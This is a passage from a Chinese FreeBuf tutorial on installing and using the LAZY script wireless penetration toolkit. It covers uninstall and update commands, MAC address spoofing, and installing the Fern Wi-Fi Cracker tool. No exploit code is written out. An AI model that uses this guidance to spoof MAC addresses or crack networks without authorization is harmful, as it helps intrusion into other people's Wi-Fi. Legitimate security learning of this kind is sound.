在声明内容过后,还会给予一段提示说明,并且蹦出判断选项。

提示的内容大概意思为该工具主要用于教育和学习,旨在提高个人专业技能,并且使用环境为当前个人网络环境内可以使用此工具,并且免责说明也很明确,如果使用者违反任何规定,将于该程序开发者无任何关系等,如果同意便选择“Yes”。

既然是第一次使用,多少整个体验过程会显得很繁琐和厌倦。这不脚本程序被正式运行后,还需要进行管理模式和监听模式的制定端口配置,下图中黄色字体表示可用接口。

全能无线渗透测试工具,一个LAZY就搞定了

当你熬过这一步之后,这个程序就算是真正的被启动了,虽说万事开头难,但考虑到它的全面性,前面的烦琐流程我们也就忍了。

全能无线渗透测试工具,一个LAZY就搞定了

程序被启动后的正式界面,在此先让大家一饱眼福,稍后再进行具体说明。

接着,我们来说下,有关这款工具的卸载与升级,当然,这些也都只能在命令状态下处理,而非图形界面中使用。

程序卸载命令:

启动卸载:cd /opt/lscript/

权限调整:chmod +x uninstall.sh 

卸载执行:./uninstall.sh 

删除剩余文件:rmdir -r /opt/lscript

程序更新命令:

直接选择运行界面中的|update) Check for updates即可,简单方便。

既然卸载和程序升级都已经进行了说明,最后就该进入测试阶段了。

既然是一款可以很好隐藏自己并查看公共地址的工具,就先从MAC入手吧。

先测试下修改MAC地址的功能,选择3)Change MAC。

全能无线渗透测试工具,一个LAZY就搞定了

全能无线渗透测试工具,一个LAZY就搞定了

系统会让我们选择对应网络,此处我们选择第一个。

全能无线渗透测试工具,一个LAZY就搞定了

全能无线渗透测试工具,一个LAZY就搞定了

如果默认选项r,只需要点击回车即可随机产生一个MAC地址出来,如果想指定一个地址就需要输入s来设定需要的MAC地址了。

全能无线渗透测试工具,一个LAZY就搞定了

全能无线渗透测试工具,一个LAZY就搞定了

当然,LAZY script既然是一个功能很全面的脚本工具,那么里面必然囊括很多不同类型的功能。这里我们根据自己的需要来选择安装即可。

为了方便测试,我们选择了选项9)TOOLS进行安装。

在工具选择完毕后,我们还能看到很多目前市面主流的渗透测试工具和框架可供我们选择安装,为了方便展示,在此选择Fern Wi-Fi Cracker破解工具进行安装。

全能无线渗透测试工具,一个LAZY就搞定了

全能无线渗透测试工具,一个LAZY就搞定了

相信作为圈内人,凡是搞过无线渗透的小伙伴对该工具都不会感到陌生,完全图形化的操作界面容易上手,选择11)Fern选项。

很快Fern工具就开始安装,不久后就能开始使用了。

全能无线渗透测试工具,一个LAZY就搞定了

在安装完毕后,我们可以选择1)Wi-Fi tools来查看工具的具体安装情况,以便知道我们目前拥有哪些可用的工具。

全能无线渗透测试工具,一个LAZY就搞定了

图中黄色序号和灰色字体工具名表示我们已经完成安装和部署,呈现可使用状态。反之红色字体的序号和工具名则需要我们重新进行安装和部署。

全能无线渗透测试工具,一个LAZY就搞定了

启动安装好的工具,便可以进入最终的用例测试和学习阶段了,至此,今天我要分享的内容结束啦。

*本文作者:2cat,转载请注明来自FreeBuf.COM